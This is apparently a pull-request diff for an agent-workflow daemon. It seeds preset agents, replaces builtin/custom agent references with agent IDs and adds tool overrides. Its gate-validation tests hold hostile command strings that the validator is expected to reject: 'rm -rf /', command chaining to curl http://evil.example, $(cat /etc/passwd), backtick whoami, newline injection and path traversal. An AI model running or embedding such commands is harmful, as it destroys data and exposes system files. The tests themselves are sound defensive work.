+	it('creates agents with correct names', async () => {
+		const { seeded } = await seedPresetAgents('space-1', manager);
+
+		const names = seeded.map((a) => a.name).sort();
+		expect(names).toEqual(['Coder', 'General', 'Planner', 'Reviewer']);
+	});
+
+	it('sets tools on each preset agent', async () => {
+		const { seeded } = await seedPresetAgents('space-1', manager);
+
+		for (const agent of seeded) {
+			expect(Array.isArray(agent.tools)).toBe(true);
+			expect((agent.tools?.length ?? 0) > 0).toBe(true);
+		}
+	});
+
+	it('reviewer has restricted tools (no Write or Edit)', async () => {
+		const { seeded } = await seedPresetAgents('space-1', manager);
+		const reviewer = seeded.find((a) => a.role === 'reviewer');
+
+		expect(reviewer).toBeDefined();
+		expect(reviewer?.tools).not.toContain('Write');
+		expect(reviewer?.tools).not.toContain('Edit');
+		expect(reviewer?.tools).toContain('Read');
+		expect(reviewer?.tools).toContain('Bash');
+	});
+
+	it('coder has full coding toolset', async () => {
+		const { seeded } = await seedPresetAgents('space-1', manager);
+		const coder = seeded.find((a) => a.role === 'coder');
+
+		expect(coder?.tools).toContain('Read');
+		expect(coder?.tools).toContain('Write');
+		expect(coder?.tools).toContain('Edit');
+		expect(coder?.tools).toContain('Bash');
+	});
+
+	it('sets descriptions on all preset agents', async () => {
+		const { seeded } = await seedPresetAgents('space-1', manager);
+
+		for (const agent of seeded) {
+			expect(typeof agent.description).toBe('string');
+			expect((agent.description?.length ?? 0) > 0).toBe(true);
+		}
+	});
+
+	it('assigns agents to the correct spaceId', async () => {
+		const { seeded } = await seedPresetAgents('space-1', manager);
+
+		for (const agent of seeded) {
+			expect(agent.spaceId).toBe('space-1');
+		}
+	});
+
+	it('is idempotent — records errors but seeds remaining agents on name collision', async () => {
+		// Seed once
+		await seedPresetAgents('space-1', manager);
+
+		// Seed again — all four names are now taken
+		const second = await seedPresetAgents('space-1', manager);
+
+		expect(second.seeded).toHaveLength(0);
+		expect(second.errors).toHaveLength(4);
+		for (const err of second.errors) {
+			expect(err.error).toMatch(/already exists/i);
+		}
+	});
+
+	it('seeds different spaces independently', async () => {
+		insertSpace(db, 'space-2');
+
+		const r1 = await seedPresetAgents('space-1', manager);
+		const r2 = await seedPresetAgents('space-2', manager);
+
+		expect(r1.seeded).toHaveLength(4);
+		expect(r2.seeded).toHaveLength(4);
+		expect(r1.errors).toHaveLength(0);
+		expect(r2.errors).toHaveLength(0);
+
+		// Each space has its own independent set
+		for (const a of r1.seeded) expect(a.spaceId).toBe('space-1');
+		for (const a of r2.seeded) expect(a.spaceId).toBe('space-2');
+	});
+
+	it('partial collision — seeds succeed for non-conflicting names', async () => {
+		// Pre-create just the 'Coder' agent
+		await manager.create({ spaceId: 'space-1', name: 'Coder', role: 'coder' });
+
+		const result = await seedPresetAgents('space-1', manager);
+
+		// Coder fails, others succeed
+		expect(result.seeded).toHaveLength(3);
+		expect(result.errors).toHaveLength(1);
+		expect(result.errors[0].name).toBe('Coder');
+	});
+});

--- a/packages/daemon/tests/unit/space/space-workflow.test.ts
+++ b/packages/daemon/tests/unit/space/space-workflow.test.ts
@@ -55,6 +55,8 @@ function seedAgent(db: BunDatabase, agentId: string, spaceId: string, name: stri
 	).run(agentId, spaceId, name, Date.now(), Date.now());
 }
 
+// Arbitrary IDs — tests that use these fixtures construct the manager with agentLookup: null
+// so no DB lookup is performed and these IDs do not need to exist in the test database.
 const coderStep: WorkflowStepInput = { name: 'Code', agentId: 'agent-coder' };
 const plannerStep: WorkflowStepInput = { name: 'Plan', agentId: 'agent-planner' };
 const generalStep: WorkflowStepInput = { name: 'Review', agentId: 'agent-general' };
@@ -480,6 +482,15 @@ describe('SpaceWorkflowManager', () => {
 			steps: [{ name: 'Step', agentId: 'anything' }],
 		});
 		expect(wf.steps[0].agentId).toBe('anything');
+	});
+
+	test('updateWorkflow rejects invalid agentId via lookup', () => {
+		const wf = manager.createWorkflow({ spaceId: 'space-1', name: 'WF', steps: [coderStep] });
+		const lookup: SpaceAgentLookup = { getAgentById: () => null };
+		const mgr = new SpaceWorkflowManager(repo, lookup);
+		expect(() =>
+			mgr.updateWorkflow(wf.id, { steps: [{ name: 'Step', agentId: 'non-existent' }] })
+		).toThrow(WorkflowValidationError);
 	});
 
 	// -------------------------------------------------------------------------

--- a/packages/daemon/tests/unit/space/space-workflow.test.ts
+++ b/packages/daemon/tests/unit/space/space-workflow.test.ts
@@ -7,8 +7,7 @@
  * - Repository: JSON round-trips (rules, tags, gates)
  * - Manager: name uniqueness within space
  * - Manager: at-least-one-step validation
- * - Manager: builtin agent ref validation (planner/coder/general valid, 'leader' rejected)
- * - Manager: custom agent ref validation via SpaceAgentLookup
+ * - Manager: agentId validation (non-empty, optional SpaceAgentLookup)
  * - Manager: gate command validation (quality_check allowlist, custom relative path, no ..)
  * - Manager: timeoutMs bounds (0–300000)
  * - Manager: step ordering via array position
@@ -56,17 +55,9 @@ function seedAgent(db: BunDatabase, agentId: string, spaceId: string, name: stri
 	).run(agentId, spaceId, name, Date.now(), Date.now());
 }
 
-const coderStep: WorkflowStepInput = { name: 'Code', agentRefType: 'builtin', agentRef: 'coder' };
-const plannerStep: WorkflowStepInput = {
-	name: 'Plan',
-	agentRefType: 'builtin',
-	agentRef: 'planner',
-};
-const generalStep: WorkflowStepInput = {
-	name: 'Review',
-	agentRefType: 'builtin',
-	agentRef: 'general',
-};
+const coderStep: WorkflowStepInput = { name: 'Code', agentId: 'agent-coder' };
+const plannerStep: WorkflowStepInput = { name: 'Plan', agentId: 'agent-planner' };
+const generalStep: WorkflowStepInput = { name: 'Review', agentId: 'agent-general' };
 
 // ---------------------------------------------------------------------------
 // Setup
@@ -113,8 +104,7 @@ describe('SpaceWorkflowRepository', () => {
 		expect(wf.steps).toHaveLength(2);
 		expect(wf.steps[0].name).toBe('Code');
 		expect(wf.steps[0].order).toBe(0);
-		expect(wf.steps[0].agentRefType).toBe('builtin');
-		expect(wf.steps[0].agentRef).toBe('coder');
+		expect(wf.steps[0].agentId).toBe('agent-coder');
 		expect(wf.steps[1].order).toBe(1);
 		expect(wf.tags).toEqual([]);
 		expect(wf.rules).toEqual([]);
@@ -182,7 +172,7 @@ describe('SpaceWorkflowRepository', () => {
 		// Small delay to ensure timestamp difference
 		await new Promise((r) => setTimeout(r, 2));
 		const updated = repo.updateWorkflow(wf.id, {
-			steps: [{ id: 'x', order: 0, name: 'Plan', agentRefType: 'builtin', agentRef: 'planner' }],
+			steps: [{ id: 'x', order: 0, name: 'Plan', agentId: 'agent-planner' }],
 		});
 		expect(updated?.updatedAt).toBeGreaterThan(before);
 	});
@@ -196,12 +186,10 @@ describe('SpaceWorkflowRepository', () => {
 		expect(wf.steps).toHaveLength(2);
 
 		const updated = repo.updateWorkflow(wf.id, {
-			steps: [
-				{ id: 'ignored', order: 0, name: 'Review', agentRefType: 'builtin', agentRef: 'general' },
-			],
+			steps: [{ id: 'ignored', order: 0, name: 'Review', agentId: 'agent-general' }],
 		});
 		expect(updated?.steps).toHaveLength(1);
-		expect(updated?.steps[0].agentRef).toBe('general');
+		expect(updated?.steps[0].agentId).toBe('agent-general');
 	});
 
 	test('updateWorkflow returns null for missing id', () => {
@@ -226,12 +214,12 @@ describe('SpaceWorkflowRepository', () => {
 	// getWorkflowsReferencingAgent
 	// -------------------------------------------------------------------------
 
-	test('getWorkflowsReferencingAgent returns workflows with matching custom agent', () => {
+	test('getWorkflowsReferencingAgent returns workflows with matching agent', () => {
 		seedAgent(db, 'agent-1', 'space-1', 'Alpha');
 		const wf = repo.createWorkflow({
 			spaceId: 'space-1',
-			name: 'WF With Custom',
-			steps: [{ name: 'Step', agentRefType: 'custom', agentRef: 'agent-1' }],
+			name: 'WF With Agent',
+			steps: [{ name: 'Step', agentId: 'agent-1' }],
 		});
 		const results = repo.getWorkflowsReferencingAgent('agent-1');
 		expect(results).toHaveLength(1);
@@ -245,15 +233,6 @@ describe('SpaceWorkflowRepository', () => {
 			steps: [coderStep],
 		});
 		expect(repo.getWorkflowsReferencingAgent('no-such-agent')).toHaveLength(0);
-	});
-
-	test('getWorkflowsReferencingAgent ignores builtin steps', () => {
-		repo.createWorkflow({
-			spaceId: 'space-1',
-			name: 'WF Builtin',
-			steps: [coderStep, plannerStep],
-		});
-		expect(repo.getWorkflowsReferencingAgent('coder')).toHaveLength(0);
 	});
 
 	// -------------------------------------------------------------------------
@@ -270,8 +249,7 @@ describe('SpaceWorkflowRepository', () => {
 		};
 		const step: WorkflowStepInput = {
 			name: 'Code',
-			agentRefType: 'builtin',
-			agentRef: 'coder',
+			agentId: 'agent-coder',
 			entryGate: entry,
 			exitGate: exit,
 			instructions: 'Write clean code',
@@ -306,16 +284,15 @@ describe('SpaceWorkflowRepository', () => {
 		expect(fetched.rules[1].appliesTo).toBeUndefined();
 	});
 
-	test('JSON round-trip: custom step stores agentRef as agent_id', () => {
+	test('JSON round-trip: agentId is stored in agent_id column and round-trips', () => {
 		seedAgent(db, 'agent-99', 'space-1', 'MyAgent');
 		const wf = repo.createWorkflow({
 			spaceId: 'space-1',
 			name: 'Custom WF',
-			steps: [{ name: 'Custom Step', agentRefType: 'custom', agentRef: 'agent-99' }],
+			steps: [{ name: 'Step', agentId: 'agent-99' }],
 		});
 		const fetched = repo.getWorkflow(wf.id)!;
-		expect(fetched.steps[0].agentRefType).toBe('custom');
-		expect(fetched.steps[0].agentRef).toBe('agent-99');
+		expect(fetched.steps[0].agentId).toBe('agent-99');
 
 		// Verify agent_id column is set
 		const row = db
@@ -434,57 +411,39 @@ describe('SpaceWorkflowManager', () => {
 	});
 
 	// -------------------------------------------------------------------------
-	// Agent ref validation — builtins
+	// Agent ID validation
 	// -------------------------------------------------------------------------
 
-	test('createWorkflow accepts all valid builtin roles', () => {
-		for (const role of ['planner', 'coder', 'general'] as const) {
-			const wf = manager.createWorkflow({
-				spaceId: 'space-1',
-				name: `WF-${role}`,
-				steps: [{ name: 'Step', agentRefType: 'builtin', agentRef: role }],
-			});
-			expect(wf.steps[0].agentRef).toBe(role);
-		}
+	test('createWorkflow accepts any non-empty agentId (no lookup)', () => {
+		const wf = manager.createWorkflow({
+			spaceId: 'space-1',
+			name: 'WF',
+			steps: [{ name: 'Step', agentId: 'some-uuid' }],
+		});
+		expect(wf.steps[0].agentId).toBe('some-uuid');
 	});
 
-	test('createWorkflow rejects leader as builtin agentRef', () => {
+	test('createWorkflow rejects empty agentId', () => {
 		expect(() =>
 			manager.createWorkflow({
 				spaceId: 'space-1',
-				name: 'Leader WF',
-				steps: [
-					{
-						name: 'Step',
-						agentRefType: 'builtin',
-						agentRef: 'leader' as unknown as 'planner',
-					},
-				],
+				name: 'Bad AgentId',
+				steps: [{ name: 'Step', agentId: '' }],
 			})
 		).toThrow(WorkflowValidationError);
 	});
 
-	test('createWorkflow rejects unknown builtin agentRef', () => {
+	test('createWorkflow rejects whitespace-only agentId', () => {
 		expect(() =>
 			manager.createWorkflow({
 				spaceId: 'space-1',
-				name: 'Bad Builtin WF',
-				steps: [
-					{
-						name: 'Step',
-						agentRefType: 'builtin',
-						agentRef: 'executor' as unknown as 'planner',
-					},
-				],
+				name: 'Whitespace AgentId',
+				steps: [{ name: 'Step', agentId: '   ' }],
 			})
 		).toThrow(WorkflowValidationError);
 	});
 
-	// -------------------------------------------------------------------------
-	// Agent ref validation — custom (via SpaceAgentLookup)
-	// -------------------------------------------------------------------------
-
-	test('createWorkflow accepts custom ref when agent exists', () => {
+	test('createWorkflow accepts agentId when agent exists in lookup', () => {
 		seedAgent(db, 'agent-1', 'space-1', 'MyAgent');
 		const lookup: SpaceAgentLookup = {
 			getAgentById: (_spaceId, id) =>
@@ -494,12 +453,12 @@ describe('SpaceWorkflowManager', () => {
 		const wf = mgr.createWorkflow({
 			spaceId: 'space-1',
 			name: 'Custom WF',
-			steps: [{ name: 'Step', agentRefType: 'custom', agentRef: 'agent-1' }],
+			steps: [{ name: 'Step', agentId: 'agent-1' }],
 		});
-		expect(wf.steps[0].agentRef).toBe('agent-1');
+		expect(wf.steps[0].agentId).toBe('agent-1');
 	});
 
-	test('createWorkflow rejects custom ref when agent does not exist', () => {
+	test('createWorkflow rejects agentId when agent does not exist in lookup', () => {
 		const lookup: SpaceAgentLookup = {
 			getAgentById: () => null,
 		};
@@ -507,30 +466,20 @@ describe('SpaceWorkflowManager', () => {
 		expect(() =>
 			mgr.createWorkflow({
 				spaceId: 'space-1',
-				name: 'Bad Custom',
-				steps: [{ name: 'Step', agentRefType: 'custom', agentRef: 'non-existent-uuid' }],
+				name: 'Bad Agent',
+				steps: [{ name: 'Step', agentId: 'non-existent-uuid' }],
 			})
 		).toThrow(WorkflowValidationError);
 	});
 
-	test('createWorkflow accepts custom ref when no lookup provided (no validation)', () => {
-		// Without agentLookup, custom refs are accepted as-is
+	test('createWorkflow skips lookup when agentLookup is null', () => {
+		// Without agentLookup, any non-empty agentId is accepted
 		const wf = manager.createWorkflow({
 			spaceId: 'space-1',
 			name: 'No-Lookup WF',
-			steps: [{ name: 'Step', agentRefType: 'custom', agentRef: 'anything' }],
+			steps: [{ name: 'Step', agentId: 'anything' }],
 		});
-		expect(wf.steps[0].agentRef).toBe('anything');
-	});
-
-	test('createWorkflow rejects empty custom agentRef', () => {
-		expect(() =>
-			manager.createWorkflow({
-				spaceId: 'space-1',
-				name: 'Empty Ref',
-				steps: [{ name: 'Step', agentRefType: 'custom', agentRef: '' }],
-			})
-		).toThrow(WorkflowValidationError);
+		expect(wf.steps[0].agentId).toBe('anything');
 	});
 
 	// -------------------------------------------------------------------------
@@ -546,8 +495,7 @@ describe('SpaceWorkflowManager', () => {
 				steps: [
 					{
 						name: 'Step',
-						agentRefType: 'builtin',
-						agentRef: 'coder',
+						agentId: 'agent-coder',
 						exitGate: { type: 'quality_check', command: cmd },
 					},
 				],
@@ -564,8 +512,7 @@ describe('SpaceWorkflowManager', () => {
 				steps: [
 					{
 						name: 'Step',
-						agentRefType: 'builtin',
-						agentRef: 'coder',
+						agentId: 'agent-coder',
 						exitGate: { type: 'quality_check', command: 'rm -rf /' },
 					},
 				],
@@ -581,8 +528,7 @@ describe('SpaceWorkflowManager', () => {
 				steps: [
 					{
 						name: 'Step',
-						agentRefType: 'builtin',
-						agentRef: 'coder',
+						agentId: 'agent-coder',
 						exitGate: { type: 'quality_check' },
 					},
 				],
@@ -598,8 +544,7 @@ describe('SpaceWorkflowManager', () => {
 				steps: [
 					{
 						name: 'Step',
-						agentRefType: 'builtin',
-						agentRef: 'coder',
+						agentId: 'agent-coder',
 						exitGate: { type: 'quality_check', command: 'bun test; rm -rf /' },
 					},
 				],
@@ -615,8 +560,7 @@ describe('SpaceWorkflowManager', () => {
 				steps: [
 					{
 						name: 'Step',
-						agentRefType: 'builtin',
-						agentRef: 'coder',
+						agentId: 'agent-coder',
 						exitGate: { type: 'quality_check', command: 'bun test && curl http://evil.example' },
 					},
 				],
@@ -632,8 +576,7 @@ describe('SpaceWorkflowManager', () => {
 				steps: [
 					{
 						name: 'Step',
-						agentRefType: 'builtin',
-						agentRef: 'coder',
+						agentId: 'agent-coder',
 						exitGate: { type: 'quality_check', command: 'bun test $(cat /etc/passwd)' },
 					},
 				],
@@ -652,8 +595,7 @@ describe('SpaceWorkflowManager', () => {
 			steps: [
 				{
 					name: 'Step',
-					agentRefType: 'builtin',
-					agentRef: 'coder',
+					agentId: 'agent-coder',
 					exitGate: { type: 'custom', command: './scripts/verify.sh' },
 				},
 			],
@@ -669,8 +611,7 @@ describe('SpaceWorkflowManager', () => {
 				steps: [
 					{
 						name: 'Step',
-						agentRefType: 'builtin',
-						agentRef: 'coder',
+						agentId: 'agent-coder',
 						exitGate: { type: 'custom', command: '/etc/passwd' },
 					},
 				],
@@ -686,8 +627,7 @@ describe('SpaceWorkflowManager', () => {
 				steps: [
 					{
 						name: 'Step',
-						agentRefType: 'builtin',
-						agentRef: 'coder',
+						agentId: 'agent-coder',
 						exitGate: { type: 'custom', command: './scripts/../../../etc/passwd' },
 					},
 				],
@@ -703,8 +643,7 @@ describe('SpaceWorkflowManager', () => {
 				steps: [
 					{
 						name: 'Step',
-						agentRefType: 'builtin',
-						agentRef: 'coder',
+						agentId: 'agent-coder',
 						exitGate: { type: 'custom', command: 'scripts/verify.sh' },
 					},
 				],
@@ -720,8 +659,7 @@ describe('SpaceWorkflowManager', () => {
 				steps: [
 					{
 						name: 'Step',
-						agentRefType: 'builtin',
-						agentRef: 'coder',
+						agentId: 'agent-coder',
 						exitGate: { type: 'custom' },
 					},
 				],
@@ -737,8 +675,7 @@ describe('SpaceWorkflowManager', () => {
 				steps: [
 					{
 						name: 'Step',
-						agentRefType: 'builtin',
-						agentRef: 'coder',
+						agentId: 'agent-coder',
 						exitGate: { type: 'custom', command: './scripts/verify.sh; rm -rf /' },
 					},
 				],
@@ -754,8 +691,7 @@ describe('SpaceWorkflowManager', () => {
 				steps: [
 					{
 						name: 'Step',
-						agentRefType: 'builtin',
-						agentRef: 'coder',
+						agentId: 'agent-coder',
 						exitGate: { type: 'custom', command: './scripts/verify.sh | cat /etc/passwd' },
 					},
 				],
@@ -771,8 +707,7 @@ describe('SpaceWorkflowManager', () => {
 				steps: [
 					{
 						name: 'Step',
-						agentRefType: 'builtin',
-						agentRef: 'coder',
+						agentId: 'agent-coder',
 						exitGate: { type: 'custom', command: './scripts/verify.sh `whoami`' },
 					},
 				],
@@ -788,8 +723,7 @@ describe('SpaceWorkflowManager', () => {
 				steps: [
 					{
 						name: 'Step',
-						agentRefType: 'builtin',
-						agentRef: 'coder',
+						agentId: 'agent-coder',
 						exitGate: { type: 'quality_check', command: 'bun test\nrm -rf /' },
 					},
 				],
@@ -805,8 +739,7 @@ describe('SpaceWorkflowManager', () => {
 				steps: [
 					{
 						name: 'Step',
-						agentRefType: 'builtin',
-						agentRef: 'coder',
+						agentId: 'agent-coder',
 						exitGate: { type: 'custom', command: './scripts/verify.sh\nrm -rf /' },
 					},
 				],
@@ -825,8 +758,7 @@ describe('SpaceWorkflowManager', () => {
 			steps: [
 				{
 					name: 'Step',
-					agentRefType: 'builtin',
-					agentRef: 'coder',
+					agentId: 'agent-coder',
 					exitGate: { type: 'human_approval', timeoutMs: 0 },
 				},
 			],
@@ -841,8 +773,7 @@ describe('SpaceWorkflowManager', () => {
 			steps: [
 				{
 					name: 'Step',
-					agentRefType: 'builtin',
-					agentRef: 'coder',
+					agentId: 'agent-coder',
 					exitGate: { type: 'human_approval', timeoutMs: 300_000 },
 				},
 			],
@@ -858,8 +789,7 @@ describe('SpaceWorkflowManager', () => {
 				steps: [
 					{
 						name: 'Step',
-						agentRefType: 'builtin',
-						agentRef: 'coder',
+						agentId: 'agent-coder',
 						exitGate: { type: 'human_approval', timeoutMs: 300_001 },
 					},
 				],
@@ -875,8 +805,7 @@ describe('SpaceWorkflowManager', () => {
 				steps: [
 					{
 						name: 'Step',
-						agentRefType: 'builtin',
-						agentRef: 'coder',
+						agentId: 'agent-coder',
 						exitGate: { type: 'human_approval', timeoutMs: -1 },
 					},
 				],
@@ -916,16 +845,16 @@ describe('SpaceWorkflowManager', () => {
 	// getWorkflowsReferencingAgent
 	// -------------------------------------------------------------------------
 
-	test('getWorkflowsReferencingAgent returns workflows using custom agent', () => {
+	test('getWorkflowsReferencingAgent returns workflows using given agent', () => {
 		seedAgent(db, 'agent-1', 'space-1', 'Alpha');
 		const wf = manager.createWorkflow({
 			spaceId: 'space-1',
 			name: 'Uses Alpha',
-			steps: [{ name: 'Step', agentRefType: 'custom', agentRef: 'agent-1' }],
+			steps: [{ name: 'Step', agentId: 'agent-1' }],
 		});
 		manager.createWorkflow({
 			spaceId: 'space-1',
-			name: 'Uses Builtin',
+			name: 'Uses Other',
 			steps: [coderStep],
 		});
 		const refs = manager.getWorkflowsReferencingAgent('agent-1');

--- a/packages/shared/src/types.ts
+++ b/packages/shared/src/types.ts
@@ -67,11 +67,13 @@ export type SessionType =
 	| 'lobby';
 
 /**
- * Context for room/lobby sessions
+ * Context for room/lobby/space sessions
  */
 export interface SessionContext {
 	roomId?: string;
 	lobbyId?: string;
+	/** Space ID for Space system sessions */
+	spaceId?: string;
 }
 
 /**

--- a/packages/shared/src/types/space.ts
+++ b/packages/shared/src/types/space.ts
@@ -326,16 +326,18 @@ export interface SpaceSessionGroup {
 // ============================================================================
 
 /**
- * Builtin agent roles available in the Space system.
+ * Preset agent roles — used as a UI label/tag that describes the agent's purpose
+ * and drives default system prompt behavior in `buildCustomAgentSystemPrompt`.
  *
- * NOTE: 'leader' is intentionally NOT a valid agent role — the Leader agent is
- * always implicit and managed by SpaceRuntime. User-configurable agents are
- * limited to worker roles: 'planner', 'coder', 'general', 'reviewer'.
+ * This is metadata only — it does NOT gate code routing. All agents (preset or
+ * user-created) are regular `SpaceAgent` records resolved by ID at runtime.
+ * SpaceRuntime seeds one agent per role when a new Space is created; users may
+ * rename, reconfigure, or delete any of them.
  *
  * - 'coder': Standard implementation worker (git workflow, PRs, tests)
- * - 'general': General-purpose worker (same as coder, broader scope)
- * - 'planner': Orchestrator-style agent (reserved for future; treated as worker)
- * - 'reviewer': Specialized worker for reviewing code/PRs (includes review-specific instructions)
+ * - 'general': General-purpose worker (broader scope, same toolset as coder)
+ * - 'planner': Planning/orchestration agent (treated as worker for now)
+ * - 'reviewer': Review-specialist worker (review-specific prompt additions)
  */
 export type BuiltinAgentRole = 'planner' | 'coder' | 'general' | 'reviewer';
 
@@ -464,28 +466,20 @@ export interface WorkflowGate {
 }
 
 /**
- * Discriminated union encoding the agent reference within a workflow step.
- *
- * Using a union (rather than two separate fields) lets TypeScript enforce that
- * 'leader' is rejected at compile time when agentRefType is 'builtin'.
- *
- * - `builtin`: agentRef is one of the BuiltinAgentRole values ('planner', 'coder', 'general').
- *   NOTE: 'leader' is NOT a valid builtin agentRef — Leader is always implicit in SpaceRuntime.
- * - `custom`: agentRef is the UUID (`id`) of a SpaceAgent defined in this Space.
- */
-export type WorkflowStepAgent =
-	| { agentRefType: 'builtin'; agentRef: BuiltinAgentRole }
-	| { agentRefType: 'custom'; agentRef: string };
-
-/**
  * A single step within a SpaceWorkflow.
  * Each step runs one agent and optionally has entry/exit gates.
+ *
+ * All agents are referenced by ID — there is no separate builtin/custom distinction.
+ * Preset agents (coder, general, planner, reviewer) seeded at Space creation time
+ * are regular SpaceAgent records that happen to have a well-known role label.
  */
-export type WorkflowStep = WorkflowStepAgent & {
+export interface WorkflowStep {
 	/** Unique identifier for this step (stable across renames) */
 	id: string;
 	/** Human-readable name for display */
 	name: string;
+	/** ID of the SpaceAgent assigned to execute this step */
+	agentId: string;
 	/**
 	 * Gate checked before this step begins execution.
 	 * If absent, the step starts automatically when the previous step's exit gate passes.
@@ -500,7 +494,7 @@ export type WorkflowStep = WorkflowStepAgent & {
 	instructions?: string;
 	/** Zero-based execution order within the workflow */
 	order: number;
-};
+}
 
 /**
  * A rule that applies to workflow execution, similar to room-level rules.
@@ -523,26 +517,11 @@ export interface WorkflowRule {
 }
 
 /**
- * Distributive Omit that preserves discriminated union structure.
- *
- * TypeScript's built-in `Omit<T, K>` does not distribute over union members —
- * when applied to an intersection type that wraps a union (like `WorkflowStep`),
- * it collapses the discriminant and silently drops union enforcement.
- * `DistributiveOmit` maps over each union branch individually so that
- * discriminated-union invariants are preserved in the result.
- */
-type DistributiveOmit<T, K extends PropertyKey> = T extends unknown ? Omit<T, K> : never;
-
-/**
  * Input shape for a workflow step at creation time.
  * `id` and `order` are backend-assigned and must not be provided by callers.
  * The backend assigns `id` (UUID) and derives `order` from the array position.
- *
- * Uses `DistributiveOmit` (not `Omit`) so that the `WorkflowStepAgent`
- * discriminated union is preserved: TypeScript will still reject
- * `agentRef: 'leader'` when `agentRefType: 'builtin'` at compile time.
  */
-export type WorkflowStepInput = DistributiveOmit<WorkflowStep, 'id' | 'order'>;
+export type WorkflowStepInput = Omit<WorkflowStep, 'id' | 'order'>;
 
 /**
  * Input shape for a workflow rule at creation time.

--- a/packages/shared/src/types/space.ts
+++ b/packages/shared/src/types/space.ts
@@ -354,7 +354,7 @@ export interface SpaceAgent {
 	description?: string;
 	/**
 	 * Builtin role preset — determines default tools and behavior.
-	 * One of: 'planner', 'coder', 'general'.
+	 * One of: 'planner', 'coder', 'general', 'reviewer'.
 	 * NOTE: 'leader' is NOT a valid role here — Leader is implicit in SpaceRuntime.
 	 */
 	role: BuiltinAgentRole;

--- a/packages/shared/src/types/space.ts
+++ b/packages/shared/src/types/space.ts
@@ -330,9 +330,14 @@ export interface SpaceSessionGroup {
  *
  * NOTE: 'leader' is intentionally NOT a valid agent role — the Leader agent is
  * always implicit and managed by SpaceRuntime. User-configurable agents are
- * limited to worker roles: 'planner', 'coder', 'general'.
+ * limited to worker roles: 'planner', 'coder', 'general', 'reviewer'.
+ *
+ * - 'coder': Standard implementation worker (git workflow, PRs, tests)
+ * - 'general': General-purpose worker (same as coder, broader scope)
+ * - 'planner': Orchestrator-style agent (reserved for future; treated as worker)
+ * - 'reviewer': Specialized worker for reviewing code/PRs (includes review-specific instructions)
  */
-export type BuiltinAgentRole = 'planner' | 'coder' | 'general';
+export type BuiltinAgentRole = 'planner' | 'coder' | 'general' | 'reviewer';
 
 /**
  * A named agent configuration within a Space.
@@ -359,6 +364,12 @@ export interface SpaceAgent {
 	provider?: string;
 	/** Custom system prompt appended to the role preset */
 	systemPrompt?: string;
+	/**
+	 * Tool list override — which tools this agent may use.
+	 * Any entry must be a name from KNOWN_TOOLS.
+	 * When unset, role-based defaults apply.
+	 */
+	tools?: string[];
 	/** Tool configuration overrides */
 	toolConfig?: Record<string, unknown>;
 	/** Creation timestamp (milliseconds since epoch) */
@@ -378,6 +389,8 @@ export interface CreateSpaceAgentParams {
 	model?: string;
 	provider?: string;
 	systemPrompt?: string;
+	/** Tool list override — any entry must be a name from KNOWN_TOOLS */
+	tools?: string[];
 	toolConfig?: Record<string, unknown>;
 }
 
@@ -391,6 +404,8 @@ export interface UpdateSpaceAgentParams {
 	model?: string | null;
 	provider?: string | null;
 	systemPrompt?: string | null;
+	/** Tool list override — null clears (reverts to role defaults) */
+	tools?: string[] | null;
 	toolConfig?: Record<string, unknown> | null;
 }
 


### PR DESCRIPTION
## Summary

- Add `tools?: string[]` to `SpaceAgent` type (and create/update params), wired to the existing `tools` DB column in `SpaceAgentRepository`
- Add `reviewer` to `BuiltinAgentRole` with updated schema CHECK constraint and migration comment
- Add `spaceId?: string` to `SessionContext` for Space system sessions
- Create `packages/daemon/src/lib/space/agents/custom-agent.ts`:
  - `CustomAgentConfig` and `ResolveAgentInitConfig` interfaces
  - `buildCustomAgentSystemPrompt`: role identification + optional custom prompt + mandatory git workflow + bypass markers + review feedback
  - `buildCustomAgentTaskMessage`: task/workflow/space context + reviewer instructions when role=reviewer or taskType=review
  - `createCustomAgentInit`: uses `agent`/`agents` pattern when custom tools configured; simple preset path otherwise
  - `resolveAgentInit`: dispatches to `createCustomAgentInit` when `task.customAgentId` set; throws descriptive M4-not-implemented error for built-in path

## Test plan

- [ ] `bun test packages/daemon/tests/unit/space/custom-agent.test.ts` — 46 tests covering all builder functions, roles, tool paths, resolution logic
- [ ] `bun test packages/daemon/tests/unit/storage/space-agent-repository.test.ts packages/daemon/tests/unit/lib/space-agent-manager.test.ts` — existing tests still pass (91 total)
- [ ] `bun run typecheck` — passes
- [ ] `bun run lint` — passes